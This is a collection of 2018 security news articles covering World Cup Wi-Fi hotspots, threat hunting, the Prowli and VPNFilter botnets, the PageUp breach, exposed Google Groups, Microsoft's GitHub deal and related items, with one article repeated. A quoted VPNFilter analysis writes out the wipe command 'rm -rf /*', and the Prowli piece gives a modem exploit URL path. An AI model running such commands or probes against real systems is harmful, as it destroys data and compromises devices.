“A lack of essential traffic encryption for Wi-Fi networks where official and global activities are taking place – such as at locations around the forthcoming FIFA World Cup 2018 – offers especially fertile ground for criminals.” reads the report published by Kaspersky.

“Over a fifth (22.4%) of Wi-Fi hotspots in FIFA World Cup 2018 host cities use unreliable networks. This means that criminals simply need to be located near an access point to grab the traffic and get their hands on user data.”

The study involved volunteers who agreed to travel around the host cities searching for public Wi-Fi hotspots. The experts discovered that around 62.4 percent of hotspots are secured via WPA2 encryption, while another 13.5 percent use another, unknown encryption method.

Of course, the level of protection for the secured networks depends on the security settings, such as the strength of the password used to access the hotspot.

Wi-Fi Russia World Cup

The study revealed that the number of secured networks varies from city to city, the researchers evaluated hotspots in 11 host cities.

Saransk was the most secure city with 72 percent of access points using WPA/WPA2, the cities of Samara and Nizhny Novogorod follow with respectively 67 and 66 percent.

Black flag for St. Petersburg, the least secure host city with just 50 percent of hotspots using WPA2 and 37 percent of access points completely unsecured.

It is important to highlight that even WPA2 protection should be considered totally secure.

“Even a WPA2 connection in a cafe couldn’t be considered as secure, if the password is visible to everyone. Nevertheless, we believe that the methodology used represents the Wi-Fi hotspot security situation in the host cities, with a fair degree of accuracy.” states Kaspersky Lab.

“The results of this research show that the security of Wi-Fi connections in FIFA World Cup hosts cities varies. Therefore. We therefore recommend that users follow some key safety rules.”

Kaspersky recommends also provided best practices such as using a trusted VPN while traveling, below the complete list:

Whenever possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning that criminals won’t be able to read your data, even if they gain access to it. For example, the Kaspersky Secure Connection VPN solution can switch on automatically when a connection is not safe.
Do not trust networks that are not password-protected, or have easy-to-guess or easy-to-find passwords.
Even if a network requests a strong password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection using the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by the employees of an establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend you also disable automatic connections to existing Wi-Fi networks.
If you are not 100% sure that the wireless network you are using is secure, but you still need to connect to the Internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely do not perform any online banking operations or enter your bank card details anywhere. This will avoid situations where your sensitive data or passwords are intercepted and then used for malicious purposes later on.
To avoid becoming a cybercriminal target, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. Enabling this option is recommended when visiting any websites you think may lack the necessary protection.


How Threat Hunters Operate in Modern Security Environments
7.6.2018 securityaffairs Cyber

Cyber security – With millions of new malware surfacing on the internet every year, threat hunters need to be ever more ready and at the top of their game to ensure that their organization can remain safe and protected from all cyber threats.
Cyber security is a universe in its own. It’s got its own unique domains, and its fair share of challenges and that are faced every day by cyber security experts. Of late, a new terminology has surfaced on the internet; threat hunter. The role of a cyber-security hunter is becomingly rapidly and crucially important with each passing day.

cyber security

In 2017, the number of cyber-attacks that took place just across the US was almost 50% higher compared to the previous year. And this year is no different. According to a recent survey conducted by Crowd Research Partners, “the number of threats in the cyber space have continued to double each year“.

While millions of businesses are facing threats from cyber criminals, the wise ones are busy recruiting, training, and equipping their cyber security threat hunters with sophisticated tools and equipment required to fight the online malice.

Naturally, the ones who are uncertain about what a cyber-security threat hunter is supposed to do, are looking for avenues to get their hands on the skill. This article will help you get a basic understanding related to most aspects of threat hunters and how they work in modern security environments.

Job Description, Skills and Qualifications of a Threat Hunter
A Network threat hunter starts his research by assuming that the network has already been breached. This assumption is based on the fact that even though tools such as VPNs (recommended ones are PureVPN, PIA & Ivacy) and other server protections are in place, a breach has been made into the network which was sophisticated enough to bypass the VPN and other security measures.

A threat hunter needs to have a proactive approach while scanning all the networks and servers for possible breaches or intrusions. He also needs to be very creative in terms of understanding anomalies and slightly abnormal happenings or instances going on over a network.

When it comes to technical knowledge, threat hunters need to be at the top of their game in this forte. Only, when they understand the depths of how a network functions and how data flows through it, can they spot issues such as data being leaked or worse, getting hijacked by someone else.

Lastly, a network threat hunter needs to know the SOPs that are prescribed by the organization he is working at, along with the SOPs of the cyber security industry. Only when he knows in totally about the culture which is expected to be religiously followed, will he be able to create exceptions and detect threats which no eyes have ever seen before.

Understanding Dynamics of Modern Security Environments
Threats that the modern security environments face are evolving every day. It will be only logical to state that the tools and procedures in use today will soon become obsolete and get replaces with new tools and tech. Consequently, organizations that are concerned about keeping their networks and digital environments secure, need to be on the constant move toward adopting new tools and techniques.

This may not guarantee ultimate safety, but will definitely play a crucial role in keeping the organizations at least at par, if not a step ahead, with the growing threats in the online space.

How Threat Hunters Operate In Modern Security Environments?
In 2016, it was reported by G Data Software that 6.8 million new malware specimen surfaced on the internet. A year later, this number rose to 7.1 million. Looking at this trend, it is very clear that the coming years are going to be no easier on the threat hunters. In fact, it emphasizes on the importance of training threat hunters and preparing them for the most unexpected.

Of the 7.1 million new strains of malware that were discovered in 2017, obviously not all of them would be dangerous. However, identifying the few dangerous ones is what determines if a digital environment is secure or not. This is where threat hunters contribute for keeping the networks secure.

A threat hunter identifies threats which AI systems may have missed. They do so by focusing on the shortcomings of their organizational security architectures, which fail at preventing threats from gaining entry into the digital environment.

How to Conduct a Threat Hunt
Outsource or DIY
The first step to efficiently conduct an organization-wide threat hunt is to determine if it could to be carried out by the in-house security team. For such a case, it is important to allocate dedicated resources and equipment to the threat hunters.

If, for any reasons, the in-house team lacks the acumen for such a task, or if there are resource or time constraints that the security team is occupied with, the safer option is to outsource it.

Focus on Key Areas and Make a Plan
It is crucial to treat threat hunting as a pre-planned process, and not as an ad hoc task. Creating a proper plan and defining procedures that should be followed throughout the threat hunting process will play a crucial role in making the efforts bring a positive impact.

With a plan and a schedule in place, it could be made sure that tasks of the threat hunting team do not interfere with those of other teams. Furthermore, the schedule can also help in pre-determining the order of tasks that are to be executed. This will allow threat hunters to operate smoothly and effectively, while keeping track of all the tasks that have been accomplished and the ones that need attention.

Produce a Hypothesis
Beginning with the end in mind makes it easy to plot your journey and now for sure when a task is completed. When hunting threats, the team should determine what it is looking for and what it wants to find. For example, in this case, the threat hunters should determine beforehand that they are looking for malwares, or intruders who may have hacked the system.

Knowing what exactly to look for makes it easy to find it if it is there, or know when to stop the search in case there are no threats. If a hypothesis is not present, the search for threats may become endless and threat hunters will never be certain about when to stop.

Gather Crucial Information and Data
There is a lot to do when it comes to organizing all the available information and data. If the data is not organized, it is useless, as it becomes almost impossible to find what’s needed at the right moment. The data that threat hunters will collect and organize can include process names, command line files, DNS queries, destination IP addresses, digital signatures, etc.

If all this information is available but not sorted in a manner which is easy to sift through, threat hunters may take a lot of time for just finding the right information, and then additional time for utilizing the data for their processes. Such an approach can inflate budgets and resources used in threat hunting, damaging the overall productivity of the threat hunting team.

Task Automation
Without taking help of AI and automating tasks, it would be impossible to keep up with the ever-growing cyber threats. Even though a human eye is very much needed, without automation, the thousands of new threats and malware that surface on the internet every day, will go unnoticed.

For threat hunters, a combination of human resource which is exceptionally good at what they do is needed with artificial intelligence that has been built for precisely finding threats to modern security environments and sensitive networks.

Execution
That being said, there is no such thing as a perfect tool or a perfect procedure that a threat hunter can follow to eliminate threats from a modern security environment. It’s always a continues to struggle between competing with the online threats that keep getting better each day, and the innovation required by threat hunters to always stay one step ahead from the cyber-attacks.

AI and the Future of Cyber Threat Hunting
One of the most evolving tools in the recent times is artificial intelligence and machine learning, which has been helping threat hunters to reduce the amount of time they are spending on detention, prevention and fixing the issues. It also helps to improve the efficiency of the measures that the threat hunters take.
However, some people believe that as AI gets better, it will replace the need for having human threat hunters. We believe that will never be the case. This is due to two reasons.

Primarily, AI is a developing technology, which is available to both sides, the good and the evil. Moreover, some analysts even suggest that future cyber threats will be created and propagated using AI and even blockchain for creating a much wider impact.

Secondly, AI is a tool created by humans. Even though it is very efficient in terms of analyzing all options at the same time and taking the best decision, it may never be able to outpace the creativity and innovation that the human mind is capable of. AI may come in very handy for implementation and research purposes, but for now, the humans will lead the show with their own creativity and critical thinking.


Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices
7.6.2018 securityaffairs IoT

Crooks have infected over 40,000 web servers, modems, and other IoT devices with the Prowli malware as part of a cryptocurrency mining campaign and to redirect victims to malicious sites.
The Prowli malware was spotted by researchers at GuardiCore, attackers composed the huge botnet by exploiting known vulnerabilities and brute-force attacks.

This campaign, dubbed Operation Prowli, aimed at servers and devices using the following arrack methods, including:

Using a self-propagating worm that targets systems running SSH by brute force credential guessing, then the infected machines download and run a cryptocurrency miner.
Exploiting the CVE-2018-7482 file download vulnerability to compromise Joomla! Servers running the K2 extension
Accessing the internet facing configuration panel of variety of DSL modems by using a URL such as http://:7547/UD/act?1 and passing in parameters exploiting a known vulnerability. The vulnerability affects the processing of SOAP data and allows remote code execution. This vulnerability was previously used by the Mirai worm.
Using several exploits and launching brute-force attacks o admin panel of WordPress sites.
Exploiting a 4-year-old vulnerability, CVE-2014-2623, to execute commands with system privileges on servers running HP Data Protector exposed to the internet (over port 5555).
Targeting Drupal, PhpMyAdmin installations, NFS boxes, and servers with exposed SMB ports via brute-force credentials guessing.
prowli op

Once attackers have compromised a server or an IoT device, they determine if they can use it for cryptocurrency mining operations. Hackers used a Monero miner and the r2r2 worm, a piece of malware used to launch SSH brute-force attacks from the hacked devices.

“The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains. Cryptocurrency is a common payload of modern worms, and in this case as in many others, our attackers prefer to mine Monero, a cryptocurrency focused on privacy and anonymity to a greater degree than Bitcoin.” reads the analysis published by the experts.

“Second source of revenue is traffic monetization fraud. Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.”

The hackers also compromised servers with the WSO Web Shell backdoor. Hacked websites were used to host malicious code that redirects visitors to a traffic distribution system (TDS), with such kind of attack scheme crooks monetize their efforts by selling hijacked traffic.

“Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.” continues the experts.

Further details on the Prowli campaign, including IoCs are reported in the analysis published by GuardiCore.


VPNFilter malware now targets new devices, even behind a firewall
7.6.2018 securityaffairs 
Virus

The VPNFilter botnet now targeting new devices from other vendors, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.
The VPNFilter botnet is worse than initially thought, according to a new report published by Cisco Talos Intelligence group, the malicious code is now targeting ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE

“First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.” reads a new analysis published by Talos team.

“New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected.”

VPNFilter bot is now able to target endpoints behind the firewall and other network devices using a new stage 3 module that injects malicious content into web traffic

The recently discovered module dubbed “ssler” could be exploited by attackers to deliver exploits to endpoints via a man-in-the-middle capability (e.g. they can intercept network traffic and inject malicious code into it without the user’s knowledge).

“The ssler module, which we pronounce as “Esler,” provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80. This module is expected to be executed with a parameter list, which determines the module’s behavior and which websites should be targeted.” continues the analysis.

VPNFilter initially infected over 500,000 routers and NAS devices, most of them in Ukraine, but fortunately, a prompt action of authorities allowed to take down it.

A week ago, experts from security firms GreyNoise Intelligence and JASK announced that the threat actor behind the VPNFilter is now attempting to resume the botnet with a new wave of infections.

Talos researchers confirmed that more devices from Linksys, MikroTik, Netgear, and TP-Link are affected, this means that the botnet could rapidly grow to infect new consumer or SOHO devices.

Talos already notified the attacks to the vendors, most of them promptly started working on new firmware to address the issue.

VPNFilter malware

According to experts at Juniper Networks, the VPNFilter bot doesn’t exploit a zero-day vulnerability.

“The initial list of targeted routers included MicroTik, Linksys, NetGear, and TPLink. It is now expanded to include devices from ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.” reads a post published by Juniper Network.

“We still do not believe this list is complete as more infected devices are being discovered. There is still no sign of any zero day vulnerability being exploited, so it is likely that known vulnerabilities and weak passwords are the main vector of infection.”

The new attacks observed by Talos leverage compromised SOHO routers to inject content into web traffic using the ssler module.

The experts noticed that one of the parameters provided to the module it the source IP, a circumstance that suggests attackers might be profiling endpoints to pick out the best targets. The module is also able to monitor destination IP, likely to choose profitable targets, such as connection to a bank, or connections on which are credentials and other sensitive data are in transit.

The experts also provided further details on the device destruction module ‘dstr’ that attackers could use to render an infected device inoperable.

The dstr module is able to delete files necessary for normal operation of the infected device, it also deletes all files and folders related to its own operation to hide its presence to a forensic analysis.

“The dstr module clears flash memory by overwriting the bytes of all available /dev/mtdX devices with a 0xFF byte. Finally, the shell command rm -rf /* is executed to delete the remainder of the file system and the device is rebooted. At this point, the device will not have any of the files it needs to operate and fail to boot.” continues the analysis.

The following table published by El Reg shows all devices targeted by the VPNFilter bot, new ones are marked with an asterisk.

VENDOR DEVICE / SERIES
ASUS RT-AC66U*; RT-N10 series*, RT-N56 series*
D-Link DES-1210-08P*; DIR-300 Series*; DSR-250, 500, and 1000 series*
Huawei HG8245*
Linksys E1200; E1500; E3000*; E3200*; E4200*; RV082*; WRVS4400N
Microtik CCR1009*; CCR1x series; CRS series*; RB series*; STX5*
Netgear DG834*; DGN series*; FVS318N*; MBRN3000*; R-series; WNR series*; WND series*; UTM50*
QNAP TS251; TS439 Pro; other devices running QTS software
TP-Link R600VPN; TL-WR series*
Ubiquiti NSM2*; PBE M5*
UPVEL Unknown devices
ZTE ZXHN H108N*
Further technical details are available in the report published by Talos.


HR Software Firm PageUp Suffers Data Breach
6.6.2018 securityweek Incindent

PageUp, an Australian company that provides HR software, informed customers this week that it launched an investigation on May 23 after detecting suspicious activity on its IT infrastructure.

The firm’s analysis of the incident revealed on May 28 that hackers may have gained access to names, contact information, usernames, and password hashes. Documents, such as signed employment contracts and resumes, should be safe as they are stored on different servers.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password,” said Karen Cariss, CEO and co-founder of PageUp.

While the company has only shared limited technical information regarding the incident, it did say that the attack involved a piece of malware. The breach has been investigated by both law enforcement and cybersecurity experts. Cybersecurity organizations and data regulators in Australia and the United Kingdom have been notified.

PageUp says it has 2.6 million active users across over 190 countries. Some of the company’s customers have notified job applicants and shut down their online recruitment pages following the incident.

Australia Post, which has been using PageUp since October 2016, highlighted that in the case of individuals whose applications were successful, bank details, tax file numbers and other sensitive information was also stored on PageUp servers. There is no evidence, however, that this data has been accessed by hackers, Australia Post said.

Wesfarmers-owned supermarket chain Coles has shut down its careers website and issued a statement saying it has suspended all connections between its systems and PageUp while an investigation is conducted. Other Wesfarmers retailers, including Kmart, Target and Officeworks, have also shut down their careers websites.

Australian telecoms giant Telstra has also suspended its online recruitment system due to the breach at PageUp. The company warned successful applicants that their date of birth, employment offer details, and pre-employment check outcomes were stored on PageUp systems.

The incident also impacts logistics and supply chain company Linfox and private health insurer Medibank, both of which have suspended their careers pages.

Several universities in the United States also use PageUp. However, at the time of writing, none of the U.S. universities listed on PageUp’s testimonials page have issued security alerts or suspended their online recruitment systems.


Thousands of Organizations Expose Sensitive Data via Google Groups
6.6.2018 securityweek Incindent

Google has issued a warning to G Suite users after researchers discovered that thousands of organizations expose sensitive information through misconfigured Google Groups instances.

The Google Groups service allows users to create mailing lists, host internal discussions, and process support tickets. These types of communications can include highly sensitive information, which is why it’s important for companies to ensure that privacy and security settings are configured properly.

When a group is configured, its creator has to set sharing options for “Outside this domain - access to groups” to either “Private” or “Public on the Internet.” While the default option is “Private,” many organizations have set it to “Public on the Internet,” in many cases likely not realizing that anyone can access the group.

Data exposed through misconfigured Google Groups

Researchers at Kenna Security have conducted an analysis of roughly 2.5 million domains and identified more than 9,600 organizations that had allowed public access to their groups. After taking a closer look at a random sample of 171 groups, the company estimated that nearly 3,000 of the over 9,600 companies leaked some type of sensitive information.

The impacted organizations include Fortune 500 companies, universities, hospitals, media firms, financial institutions, and even government agencies.

The exposed information includes financial data, passwords, and documents containing confidential information.

“Given the sensitive nature of this information, possible implications include spear-phishing, account takeover, and a wide variety of case-specific fraud and abuse,” Kenna Security said in a blog post.

The company notified some of the organizations leaking highly sensitive data and pointed out that the “views” counter was in a vast majority of cases at zero, which indicates that no one had seen the information.

Kenna has also notified Google, but since this is not an actual vulnerability, the issue cannot be addressed with a patch. The tech giant did say, however, that it’s always reviewing its products to “help users make decisions that are appropriate for their organizations.”

Google has also published a post on its G Suite blog, providing advice on how users can configure their Google Groups settings to better protect their data.

This is not the first time researchers have warned about the risks associated with misconfigured Google Groups instances. Last year, cloud security firm RedLock warned that hundreds of organizations were likely exposing sensitive data through Google Groups. At the time, the company found names, email and home addresses, employee salary data, sales pipeline data, and customer passwords in the exposed groups.


VPNFilter Continues Targeting Routers in Ukraine
6.6.2018 securityweek
Virus

Despite their infrastructure being disrupted, the hackers behind the VPNFilter botnet continue targeting routers located in Ukraine, which is believed to be the campaign’s primary target.

When Cisco Talos brought the existence of VPNFilter to light last month, the botnet had ensnared at least 500,000 routers and network-attached storage (NAS) devices across 54 countries.

The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.

During the first stage of the infection process, once it completed initialization, the malware attempted to obtain an IP address from images hosted on the Photobucket service. If that failed, it would try to acquire the IP from an image hosted on a backup domain, toknowall.com. That IP pointed to a server hosting the stage 2 payload.

Photobucket has closed the accounts used in the attack and the FBI has managed to take control of the toknowall.com domain, thus disrupting the operation.

However, VPNFilter is designed to open a listener and wait for a specific trigger packet if the backup domain fails as well. This allows the attacker to still provide the IP for the stage 2 component.

While it’s unclear exactly what else the FBI and cybersecurity firms did to disrupt the botnet, researchers at Jask and GreyNoise Intelligence noticed that VPNFilter has continued to target routers even after Talos published its report and the toknowall.com domain was seized.

Experts have observed some IPs scanning port 2000 for vulnerable MikroTik routers located exclusively in Ukraine. The source IPs have been traced to countries such as Russia, Brazil, the United States, and Switzerland.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research,” Jask wrote in a blog post.

The VPNFilter attack was allegedly launched by Russia – specifically the group known as Sofacy, APT28, Pawn Storm, Fancy Bear, and Sednit – and the main target is believed to be Ukraine. Some links have also been found between the VPNFilter malware and BlackEnergy, which has been used by a different Russia-linked threat actor known as Sandworm. The FBI has viewed Sofacy and Sandworm as the same group when it attributed VPNFilter to Russia.

The VPNFilter malware has been observed targeting devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. All of these vendors have published advisories to warn their customers about the threat.

The FBI has advised users to reboot their routers to temporarily disrupt the malware. While rebooting a router is typically enough to remove a piece of malware, VPNFilter has a clever persistence mechanism that helps its stage 1 component survive a reboot of the device.


Microsoft to Acquire GitHub for $7.5 Billion
6.6.2018 securityweek IT

Microsoft on Monday announced that it has agreed to acquire software development and collaborateion platform GitHub in a deal valued at $7.5 billion.

Under the terms of the agreement, Microsoft will acquire GitHub for $7.5 billion in Microsoft stock. The dal is expected to close by the end of 2018, subject to customary closing conditions and regulatory review.

GitHub is a cloud-based repository for source code, offering hosting, version control management and code collaboration capabilities. It is thought to have 27 million developers using its services in nearly every country in the world, and to host 80 million code repositories. Microsoft is already a major user of GitHub, reportedly with more than 1,000 employees pushing code to GitHub repositories.

GitHub was valued at $2 billion dollars at its most recent funding round in 2015.

The acquisition makes sense for Microsoft with its increasing involvement with Linux and open source projects. There is, however, concern among many of the independent developers using the service, pointing to a perceived performance reduction from both LinkedIn and Skype following earlier acquisition by Microsoft.

"LinkedIn has turned into a slow-loading junk after the Microsoft acquisition. I can only imagine what awaits GitHub," tweeted Catalin Cimpanu.

A further concern is that ownership could give Microsoft access to the source of potentially competitive or disruptive projects. "This is not all about Microsoft," was another tweet. "This is about the independence of what has become the de-facto home of open source. It shouldn't be owned by any company that has any agenda other than host that home."

Robert Graham of Errata Security has a different concern. GitHub has a history of national censorship attempts -- a DDoS out of Russia in 2014; blocked in India in 2014; a DDoS apparently out of China in 2015; and blocked in Turkey in 2016. On February 28, 2018, GitHub was hit by a world record DDoS peaking at 1.35 Tbps.

His concern now is that China would be able to censor GitHub via Microsoft. It cannot currently censor individual pages (such as those about the Tiananmen Square massacre in 1989) because GitHub forces the use of SSL/TLS, so the China Firewall cannot see which pages are being accessed. "The only option," he tweeted "would be to block the entire site, all access to http://GitHub.com, but China can't do that either, because so much source code is hosted on GitHub -- source code their industry needs in order to build products."

As an independent organization he believes that GitHub is too important to be blocked by the Chinese government. "When Microsoft buys GitHub, however, China will now have leverage, threatening other Microsoft interests in China in order to pressure Microsoft into censoring some GitHub pages."

In the meantime, with few details of the terms and conditions, users' reactions have been largely emotional. There was widespread concern that Microsoft's motive in buying LinkedIn was to gain access to the personal details of the world's business management. There is similar concern now that Microsoft is seeking to gain some form of control over the world's open source software.

This is unlikely. SecurityWeek spoke to Robin Wood (aka DigiNinja), an independent penetration tester who uses GitHub to host the tools he develops for his trade. Assuming the purchase is finalized, "I think the important thing to look at is the exact details of the terms and conditions and any changes they decide to make to it," he told SecurityWeek. "There may be clauses in there about ownership or use without license that currently don't mean much but could mean a lot with the change of ownership."

For the moment, he is not worried by the takeover. "There are a number of established alternatives, so they can't do much to mess up actual usage otherwise people will just move away. So probably no real change for most users of the service but some with tools that Microsoft are interested in may be hit."

For himself and his own repositories, "I won't be moving my tools unless there are any specific negative changes that affect me, but I reckon there will be a bunch of people jumping ship early just in case, and another bunch fear-mongering about all the nasty stuff that might happen, most of it just guess work."

Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub’s current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives, Microsoft said.


Google Password Protects Pixel 2 Firmware
6.6.2018 securityweek Safety

Google has made the firmware of Pixel 2 devices resistant to unauthorized attempts to upgrade it by password protecting it.

Specifically, anyone interested in upgrading the firmware of a Pixel 2 device needs to supply the user password to successfully complete the process and still have access to user data.

Google has been demanding full-disk encryption for new Android devices since 2015, and the newly implemented protection is meant to complement that security feature. Google Pixel devices also encrypt all user data, and keep the encryption key protected in secure hardware.

“The secure hardware runs highly secure firmware that is responsible for checking the user's password. If the password is entered incorrectly, the firmware refuses to decrypt the device. This firmware also limits the rate at which passwords can be checked, making it harder for attackers to use a brute force attack,” Google explains in a blog post.

Google is also applying digital signatures in their attempt to prevent attackers from replacing a device’s firmware with a malicious iteration. To replace the firmware, an attacker would have to find and exploit a vulnerability in the signature-checking process, or to gain access to the signing key, then sign their firmware version to trick the device into accepting it.

While the signature-checking software is small, isolated, and vetted, which makes exploitation difficult, the signing keys are accessible because they are stored in secure locations, although only a limited number of people have access to them.

“That's good, but it leaves those people open to attack by coercion or social engineering. That's risky for the employees personally, and we believe it creates too much risk for user data,” Google notes.

Google Pixel 2 devices, the Internet giant says, have insider attack resistance in the tamper-resistant hardware security module to protect the encryption keys. Thus, if an attacker does come up with a properly signed malicious firmware, they cannot install it on the security module without the user's cooperation.

Specifically, the correct password is required to upgrade the firmware. While upgrades can be forced, the company says, the process would wipe the secrets used to decrypt the user's data, effectively destroying it.

“The Android security team believes that insider attack resistance is an important element of a complete strategy for protecting user data. The Google Pixel 2 demonstrated that it's possible to protect users even against the most highly-privileged insiders. We recommend that all mobile device makers do the same,” Google notes.


Cyber Range Developer Cyberbit Raises $30 Million
6.6.2018 securityweek IT

Israel-based Cyberbit Ltd., a provider of cyber range training and simulation platforms, announced on Monday that it has received a $30 million investment from Claridge Israel.

Cyberbit offers a cyber range for simulated cyber training, and a detection and response platform to help protect an organization’s attack surface across IT, OT and IoT networks.

Founded in 2015, Cyberbit is a subsidiary of Elbit Systems and has offices in Israel, Unites States, Europe, and Asia.

With the funding, Cyberbit says it will expand sales and marketing, primarily in North America, boost product development, and enhance customer and partner support.

“Cyberbit’s growth in just three years has been remarkable,” said Rami Hadar, Managing Director at Claridge Israel. “This growth is driven by a unique product portfolio that addresses several of the most pressing industry problems, a solid go-to-market strategy and a highly capable team that is executing successfully and creating a leadership position in several markets.”


Federal Agencies Respond to 2017 Cybersecurity Executive Order
6.6.2018 securityweek BigBrothers

Federal Agencies Respond to 2017 Cybersecurity Executive Order

The U.S. Department of State, the Department of Homeland Security (DHS), the Department of Commerce, and the Office of Management and Budget (OMB) last week published reports in response to the cybersecurity executive order signed by President Donald Trump last year in an effort to improve the protection of federal networks and critical infrastructure against cyberattacks.

Department of State on deterring adversaries

The Department of State has published two reports with recommendations to President Trump on reducing the risk of cyber conflict, detering malicious actors, maintaining an open and interoperable Internet, and protecting the country’s cyber interests through international cooperation.

The State Department believes the United States can deter both state and non-state actors using two approaches: improving the security of its networks, and through “cost imposition.”

The goal is to prevent cyberattacks that can be classified as use of force, and a long-lasting reduction of less serious destructive and disruptive activities that fall below the use of force threshold.

“The President already has a wide variety of cyber and non-cyber options for deterring and responding to cyber activities that constitute a use of force. Credibly demonstrating that the United States is capable of imposing significant costs on those who carry out such activities is indispensable to maintaining and strengthening deterrence,” the State Department’s report reads.

It adds, “With respect to activities below the threshold of the use of force, the United States should, working with like minded partners when possible, adopt an approach of imposing swift, costly, and transparent consequences on foreign governments responsible for significant malicious cyber activities aimed at harming U.S. national interests.”

Criminal charges, prosecutions and sanctions can represent an efficient deterrent, but the government should make it clear to potential adversaries that they would face consequences if they engage in malicious cyber activities. However, these types of actions may not deter some threat actors, such as terrorists, in which case the solution is increasing the operational cost and complexity for the adversary to achieve its goal, the State Department said.

OMB report on cybersecurity risk determination

The Executive Office of the President through the OMB has published a Federal Cybersecurity Risk Determination Report and Action Plan, which assesses cybersecurity risk management capabilities across federal agencies and provides recommendations on addressing gaps.

An analysis of 96 civilian agencies showed that 71 of them had been assigned an “At Risk” or “High Risk” rating for their ability to identify, detect and respond to cyber incidents and recover from them.

“OMB and DHS also found that agencies are not equipped to determine how malicious actors seek to gain access to their information systems and data. This overall lack of timely threat information means agencies are spending billions of dollars on security capabilities without fully understanding the dangers their facing in the digital wild. This situation creates enterprise-wide gaps in network visibility, IT tool and capability standardization, and common operating procedures, all of which negatively impact Federal cybersecurity,” the OMB said in its report.

The OMB and DHS have detailed the actions required to address cybersecurity risks and say they have already started implementing them.

Department of Commerce and DHS on enhancing resilience against botnets

The Department of Commerce and DHS have published a report on enhancing the resilience of the Internet against botnets and other automated threats.

After collecting data on the matter, the agencies determined that international collaboration is needed due to many devices ensnared by botnets being located outside the U.S. They also believe this challenge can only be solved through collaboration between different stakeholders.

The organizations found that while the tools and processes required to address the problem exist, they are not applied in some market sectors due to various reasons, including budgets, lack of awareness, lack of incentives, and insufficient technical expertise.

“The recommended actions and options include ongoing activities that should be continued or expanded, as well as new initiatives. No single investment or activity can mitigate all threats , but organized discussions and stakeholder feedback will allow us to further evaluate and prioritize these activities based on their expected return on investment and ability to measurably impact ecosystem resilience,” reads the report from the DHS and the Department of Commerce.

DHS and Commerce on cybersecurity workforce

The DHS and the Commerce Department also published a report on supporting the growth and sustainment of the United States’ cybersecurity workforce.

According to the report, there had been nearly 300,000 cybersecurity-related job openings in the United States as of August 2017. The agencies believe veterans represent an underutilized workforce supply, and women and minorities are underrepresented in the field. They admit that while pay for cybersecurity roles is typically above average, the government pays cybersecurity staff below the level needed to attract the necessary talent.

“A successful cybersecurity workforce strategy for the Nation should include an enhanced focus upon the value of diversity and inclusion and convert it into a potent resource that can be used to great advantage. Fostering and sustaining a diverse workforce will support the ability to find new talent to carry out this effort and to uncover novel ways to solve problems. Integrating cyber security concepts in to our primary and secondary education curricula will generate early interest in cyber security in a manner that cuts across all sectors of American society. Among workforce - aged adults, veterans, women, minorities, and the economically disadvantaged should be aggressively recruited, without compromising required standards,” the report reads.


Cyber Range Developer Cyberbit Raises $30 Million
6.6.2018 securityweek IT

Israel-based Cyberbit Ltd., a provider of cyber range training and simulation platforms, announced on Monday that it has received a $30 million investment from Claridge Israel.

Cyberbit offers a cyber range for simulated cyber training, and a detection and response platform to help protect an organization’s attack surface across IT, OT and IoT networks.

Founded in 2015, Cyberbit is a subsidiary of Elbit Systems and has offices in Israel, Unites States, Europe, and Asia.

With the funding, Cyberbit says it will expand sales and marketing, primarily in North America, boost product development, and enhance customer and partner support.

“Cyberbit’s growth in just three years has been remarkable,” said Rami Hadar, Managing Director at Claridge Israel. “This growth is driven by a unique product portfolio that addresses several of the most pressing industry problems, a solid go-to-market strategy and a highly capable team that is executing successfully and creating a leadership position in several markets.”


New Backdoor Based on HackingTeam’s Surveillance Tool
6.6.2018 securityweek
Virus

A recently discovered backdoor built by the Iron cybercrime group is based on the leaked source code of Remote Control System (RCS), HackingTeam’s infamous surveillance tool, security firm Intezer reports.

The Iron group is known for the Iron ransomware (which a rip-off Maktub malware) and is believed to have been active for around 18 months.

During this time, the cybercriminals built various malware families, including backdoors, crypto-miners, and ransomware, and targeted Windows, Linux, and Android devices. To date, the group is believed to have infected at least a few thousand victims.

Their new backdoor, the security researchers say, was first observed in April this year and features an installer protected with VMProtect and compressed using UPX.

During installation, it checks if it runs in a virtual machine, drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor in the Temp folder, then checks OS version and launches the backdoor based on the platform iteration.

The malware also checks if Qhioo360 products are present on the systems and only proceeds if none is found. It also installs a malicious certificate to sign the backdoor binary as root CA, then creates a service pointing back to the backdoor.

